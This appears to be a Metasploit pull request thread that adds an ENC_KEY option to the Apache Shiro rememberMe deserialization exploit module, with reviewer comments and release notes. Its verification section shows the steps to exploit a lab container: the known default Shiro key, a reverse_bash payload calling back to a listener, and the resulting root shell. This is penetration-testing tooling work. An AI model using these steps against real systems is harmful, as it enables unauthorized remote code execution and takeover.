replace hard-coded shiro default key with ENC_KEY

[axxop]

In some cases, we need non-default keys.

Verification

Start shiro:
docker run -d -p 80:8080 medicean/vulapps:s_shiro_1

List the steps needed to make sure this thing works

• Start msfconsole
• use multi/http/shiro_rememberme_v124_deserialize
• set LHOST 10.0.0.156
• run

output:

msf6 exploit(multi/http/shiro_rememberme_v124_deserialize) > options 

Module options (exploit/multi/http/shiro_rememberme_v124_deserialize):

   Name       Current Setting           Required  Description
   ----       ---------------           --------  -----------
   Proxies                              no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.0.0.156                yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80                        yes       The target port (TCP)
   SHIROKEY   kPH+bIxk5D2deZiIxcaaaA==  yes       Shiro default key
   SSL        false                     no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                         yes       Base directory path
   VHOST                                no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.111.111.7     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command payload


msf6 exploit(multi/http/shiro_rememberme_v124_deserialize) > run

[*] Started reverse TCP handler on 10.111.111.7:4444 
[*] Command shell session 9 opened (10.111.111.7:4444 -> 10.111.111.5:41572) at 2020-12-16 11:11:33 +0800

whoami
root

[bcoles]

Seems reasonable to me. A minor comment on the option description phrasing.

Please also update the module documentation to mention this new option.

• documentation/modules/exploit/multi/http/shiro_rememberme_v124_deserialize.md

It may also be nice to update the module description to mention something about the key, as technically this is exploitable on every version of Shiro if the key is known.

[bwatters-r7]

This all looks good to me.

[gwillcox-r7]

Thanks @bwatters-r7 will land this now.

[gwillcox-r7]

Release Notes

Replaced the hardcoded default Shiro encryption key within the shiro_rememberme_v124_deserialize module with a new datastore option named ENC_KEY which allows users to specify the key used to encrypt the rememberMe cookie. This in turn allows the module to target more recent versions provided the user knows the right encryption key value.